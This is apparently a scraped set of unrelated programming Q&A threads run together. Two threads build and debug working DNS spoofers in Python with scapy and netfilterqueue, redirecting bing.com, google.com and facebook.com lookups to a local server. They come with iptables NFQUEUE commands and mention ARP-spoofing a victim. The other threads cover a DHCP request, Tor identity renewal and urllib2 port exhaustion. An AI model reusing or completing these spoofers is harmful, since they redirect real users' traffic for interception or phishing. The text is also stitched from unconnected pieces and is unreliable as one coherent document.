I am running this code and it seems it isn't even making it past the second if statement. Can anyone help? Any help would be appreciated, since I am very new to this kind of stuff.
import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if 'www.bing.com' in qname:
            print('[+] Spoofing Target...')
            answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.8')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            packet.set_payload(str(scapy_packet))
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
You should try this on HTTP sites first, like website.org, and check that the Apache service is running with "service apache2 start".
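One more thing worth checking, assuming you run this under Python 3: there qname comes back as a bytes object, so the test 'www.bing.com' in qname raises a TypeError rather than matching, and str(scapy_packet) doesn't produce the raw packet bytes either. A minimal sketch of the same handler with just those two lines changed (queue setup stays as above):

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if b'www.bing.com' in qname:  # qname is bytes under Python 3
            print('[+] Spoofing Target...')
            answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.8')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            # drop stale length/checksum fields so scapy recomputes them
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            packet.set_payload(bytes(scapy_packet))  # raw bytes, not the str() repr
    packet.accept()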
I've decided to try to request an IP address using scapy. I am able to send out a discover and receive an offer in the variable ansD. Unfortunately I'm having trouble accessing the field that contains the offered IP address, which should be ansD[BOOTP].yiaddr. It tells me that the field does not exist. I have looked around and have seen similar issues, but cannot seem to understand why I can access normal packet fields yet fail to do so with BOOTP fields.
receivedIP = 0
conf.checkIPaddr = False
fam, hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ansD, unans = srp(dhcp_discover, multi=True)
if True:
    dhcp_request = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw,yiaddr=ansD[BOOTP].yiaddr)/DHCP(options=[("message-type","request"),"end"])
    ansR, unans = srp(dhcp_request, multi=True)
The error: 'list' object has no attribute 'yiaddr'
I figured it out not two seconds after posting, but hopefully this helps others in the future.
I used srp() instead of srp1(); the former returns a list of answered packets, so I would need to index the specific packet I want to look at: ansD[0][BOOTP].yiaddr. I have since changed my code to use srp1() instead, since this is a DHCP request expecting only one specific "Offer" reply from the DHCP server.
Fixed code below
import sys
from scapy.all import *

receivedIP = 0
conf.checkIPaddr = False
fam, hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ansD = srp1(dhcp_discover, multi=True)
if True:
    # Request using the IP the server offered us in ansD[BOOTP].yiaddr
    dhcp_request = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw,yiaddr=ansD[BOOTP].yiaddr)/DHCP(options=[("message-type","request"),"end"])
    ansR, unans = srp(dhcp_request, multi=True)
    ansR.summary()
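If you also want to read back the address from the server's reply to the request, remember that srp() returns answered/unanswered lists whose entries are (sent, received) pairs, so the reply sits at index 1. A small sketch (ackedIP is just an illustrative name, and it assumes the request actually got an answer):

# entries of the answered list are (sent, received) pairs;
# the server's reply is the second element of the first pair
if ansR:
    ackedIP = ansR[0][1][BOOTP].yiaddr
    print("Acquired IP: " + ackedIP)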
I've been following a course on cybersecurity and I'm currently trying to make a DNS spoofer work. The idea is that each time the target (this same computer) tries to go to www.google.com, it goes to the Apache server instead. But the only thing it does is stop Google from loading. Suffice to say, I have little experience.
I start by:
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0
Then, on Python 3.7:
import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if b'www.google.com' in qname:
            answer = scapy.DNSRR(rrname=qname, rdata=b'10.0.2.5')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            packet.set_payload(b'scapy_packet')
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
I'm using a NAT network and 10.0.2.5 is my apache server.
Maybe replace:
packet.set_payload(b'scapy_packet')
with:
packet.set_payload(bytes(scapy_packet))
b'scapy_packet' is just a literal byte string of those characters, not your modified packet; bytes(scapy_packet) serializes the rebuilt packet back into raw bytes.
I don't know why my script doesn't work; the victim's browser shows ERR_NAME_NOT_RESOLVED.
My script:
from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
    originalPayload = IP(packet.get_payload())
    if not originalPayload.haslayer(DNSQR):
        # Not a DNS query, accept and go on
        packet.accept()
    else:
        if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
            print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
            # Build the spoofed response
            spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\
                UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\
                DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
                    an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
            print "Spoofing DNS response to: " + spoofedPayload.summary()
            packet.set_payload(str(spoofedPayload))
            packet.accept()
            print "------------------------------------------"
        else:
            # DNS query but not for the target spoofDomain, accept and go on
            packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('')
    nfqueue.unbind()
I use the command: iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1
First I perform a man-in-the-middle attack via ARP cache spoofing. I used Wireshark to watch the traffic and it seems to be OK; I don't know what is going on.
I solved the problem: I was matching on DNS queries without realizing it, sorry.
if not originalPayload.haslayer(DNSQR)
DNSQR is a DNS query record, and I want to intercept DNS answers, so the check should be:
if not originalPayload.haslayer(DNSRR)
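With that flipped check, the start of dnsSpoof lets everything through except DNS answers; a minimal sketch of the corrected branch (the spoofed-response construction stays exactly as in the script above):

from scapy.all import IP, DNSRR

def dnsSpoof(packet):
    originalPayload = IP(packet.get_payload())
    # DNSRR records only appear in DNS answers; plain queries carry just DNSQR
    if not originalPayload.haslayer(DNSRR):
        packet.accept()
        return
    # ... build and inject the spoofed response exactly as in the script above ...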
I'm attempting to control Tor with Python. I've read a couple of the other questions asked about this subject on Stack Overflow, but none of them answer this question.
I'm looking for a method to have Tor give you a 'new identity', a new IP address, when the command is run. I've googled around and found the TorCtl module as a way of controlling Tor, but can't find a way to get a new identity. Here's what I have so far for at least connecting to Tor, but I can't get any farther.
from TorCtl import TorCtl
conn = TorCtl.connect(controlAddr="127.0.0.1", controlPort=9051, passphrase="123")
Any help on this is appreciated; if there are other modules better than TorCtl, that'd be great too! Thank you!
Well, out of luck I managed to find a PHP script that did the exact same thing I wanted, and with its help I converted it to work with TorCtl. This is what it looks like, for anyone else needing it in the future!
from TorCtl import TorCtl
conn = TorCtl.connect(controlAddr="127.0.0.1", controlPort=9051, passphrase="123")
TorCtl.Connection.send_signal(conn, "NEWNYM")
You can use similar code in Python:

import socket

def renewTorIdentity(self, passAuth):
    try:
        s = socket.socket()
        s.connect(('localhost', 9051))
        s.send('AUTHENTICATE "{0}"\r\n'.format(passAuth))
        resp = s.recv(1024)
        if resp.startswith('250'):
            s.send("signal NEWNYM\r\n")
            resp = s.recv(1024)
            if resp.startswith('250'):
                print "Identity renewed"
            else:
                print "response 2:", resp
        else:
            print "response 1:", resp
    except Exception as e:
        print "Can't renew identity: ", e
You can check this post for a mini-tutorial
Apparently the stem package works better. You can install Tor on your computer and keep it running in a terminal. Then run the following program:
from stem import Signal
from stem.control import Controller

with Controller.from_port(port=9051) as controller:
    controller.authenticate()
    controller.signal(Signal.NEWNYM)
stem is the official package developed by the Tor Project, and you can see their documentation.
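If your ControlPort is password-protected like in the TorCtl snippets above, stem's authenticate() accepts the password directly. A sketch, assuming the control port is 9051 and the password is "123" as in the earlier examples:

from stem import Signal
from stem.control import Controller

with Controller.from_port(port=9051) as controller:
    controller.authenticate(password="123")  # control-port password set via HashedControlPassword
    controller.signal(Signal.NEWNYM)         # ask Tor for a fresh circuit / identity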
I'm writing code that will run on Linux, OS X, and Windows. It downloads a list of approximately 55,000 files from the server, then steps through the list of files, checking if the files are present locally. (With SHA hash verification and a few other goodies.) If the files aren't present locally or the hash doesn't match, it downloads them.
The server-side is plain-vanilla Apache 2 on Ubuntu over port 80.
The client side works perfectly on Mac and Linux, but gives me this error on Windows (XP and Vista) after downloading a number of files:
urllib2.URLError: <urlopen error <10048, 'Address already in use'>>
This link: http://bytes.com/topic/python/answers/530949-client-side-tcp-socket-receiving-address-already-use-upon-connect points me to TCP port exhaustion, but "netstat -n" never showed me more than six connections in "TIME_WAIT" status, even just before it errored out.
The code (called once for each of the 55,000 files it downloads) is this:
request = urllib2.Request(file_remote_path)
opener = urllib2.build_opener()
datastream = opener.open(request)
outfileobj = open(temp_file_path, 'wb')
try:
    while True:
        chunk = datastream.read(CHUNK_SIZE)
        if chunk == '':
            break
        else:
            outfileobj.write(chunk)
finally:
    outfileobj.close()
    datastream.close()
UPDATE: I find by grepping the log that it enters the download routine exactly 3998 times. I've run this multiple times and it fails at 3998 each time. Given that the linked article states that available ports are 5000-1025=3975 (and some are probably expiring and being reused), it's starting to look a lot more like the linked article describes the real issue. However, I'm still not sure how to fix this. Making registry edits is not an option.
If it really is a resource problem (the OS failing to free socket resources fast enough), try this:
request = urllib2.Request(file_remote_path)
opener = urllib2.build_opener()
datastream = None
retry = 3  # 3 tries
while retry:
    try:
        datastream = opener.open(request)
    except urllib2.URLError, ue:
        if str(ue.reason).find('10048') > -1:
            retry -= 1
            if not retry:
                raise urllib2.URLError("Address already in use / retries exhausted")
        else:
            raise  # some other error, don't keep retrying
    if datastream:
        retry = 0
        outfileobj = open(temp_file_path, 'wb')
        try:
            while True:
                chunk = datastream.read(CHUNK_SIZE)
                if chunk == '':
                    break
                else:
                    outfileobj.write(chunk)
        finally:
            outfileobj.close()
            datastream.close()
If you want, you can insert a sleep, or make it OS-dependent.
On my Win XP machine the problem doesn't show up (I reached 5000 downloads).
I watch my processes and network activity with Process Hacker.
Thinking outside the box, the problem you seem to be trying to solve has already been solved by a program called rsync. You might look for a Windows implementation and see if it meets your needs.
You should seriously consider copying and modifying this pyCurl example for efficient downloading of a large collection of files.
Instead of opening a new TCP connection for each request you should really use persistent HTTP connections - have a look at urlgrabber (or alternatively, just at keepalive.py for how to add keep-alive connection support to urllib2).
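For instance, with the keepalive.py module from urlgrabber the surrounding urllib2 code can stay unchanged; a sketch, assuming keepalive.py is on your path and exposes its HTTPHandler class as documented:

import urllib2
from keepalive import HTTPHandler  # keepalive.py from urlgrabber

# install a global opener that reuses TCP connections across requests
opener = urllib2.build_opener(HTTPHandler())
urllib2.install_opener(opener)

# later urlopen() calls now reuse sockets instead of opening new ones
datastream = urllib2.urlopen(file_remote_path)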
All indications point to a lack of available sockets. Are you sure that only 6 are in TIME_WAIT status? If you're running so many download operations, it's very likely that netstat overruns your terminal buffer. I find that netstat overruns my terminal even during normal usage periods.
The solution is to either modify the code to reuse sockets or to introduce a timeout. It also wouldn't hurt to keep track of how many open sockets you have, to optimize waiting. The default timeout on Windows XP is 120 seconds, so you want to sleep for at least that long if you run out of sockets. Unfortunately it doesn't look like there's an easy way to check from Python when a socket has closed and left the TIME_WAIT status.
Given the asynchronous nature of the requests and timeouts, the best way to do this might be in a thread. Make each thread sleep for 2 minutes before it finishes. You can either use a semaphore or limit the number of active threads to ensure that you don't run out of sockets.
Here's how I'd handle it. You might want to add an exception clause to the inner try block of the fetch section, to warn you about failed fetches.
import time
import threading
import Queue
import urllib2

# assumes url_queue is a Queue object populated with tuples in the form of (url_to_fetch, temp_file)
# also assumes that TotalUrls is the size of the queue before any threads are started.

class urlfetcher(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        try:  # needed to handle the Empty exception raised by an empty queue.
            file_remote_path, temp_file_path = self.queue.get(block=False)
        except Queue.Empty:
            return
        request = urllib2.Request(file_remote_path)
        opener = urllib2.build_opener()
        datastream = opener.open(request)
        outfileobj = open(temp_file_path, 'wb')
        try:
            while True:
                chunk = datastream.read(CHUNK_SIZE)
                if chunk == '':
                    break
                else:
                    outfileobj.write(chunk)
        finally:
            outfileobj.close()
            datastream.close()
        time.sleep(120)  # sit out the TIME_WAIT period before releasing the socket
        self.queue.task_done()

Elsewhere:

for _ in xrange(TotalUrls):
    while threading.active_count() >= 3975:  # hard limit of available ports
        time.sleep(2)
    urlfetcher(url_queue).start()
url_queue.join()
Sorry, my python is a little rusty, so I wouldn't be surprised if I missed something.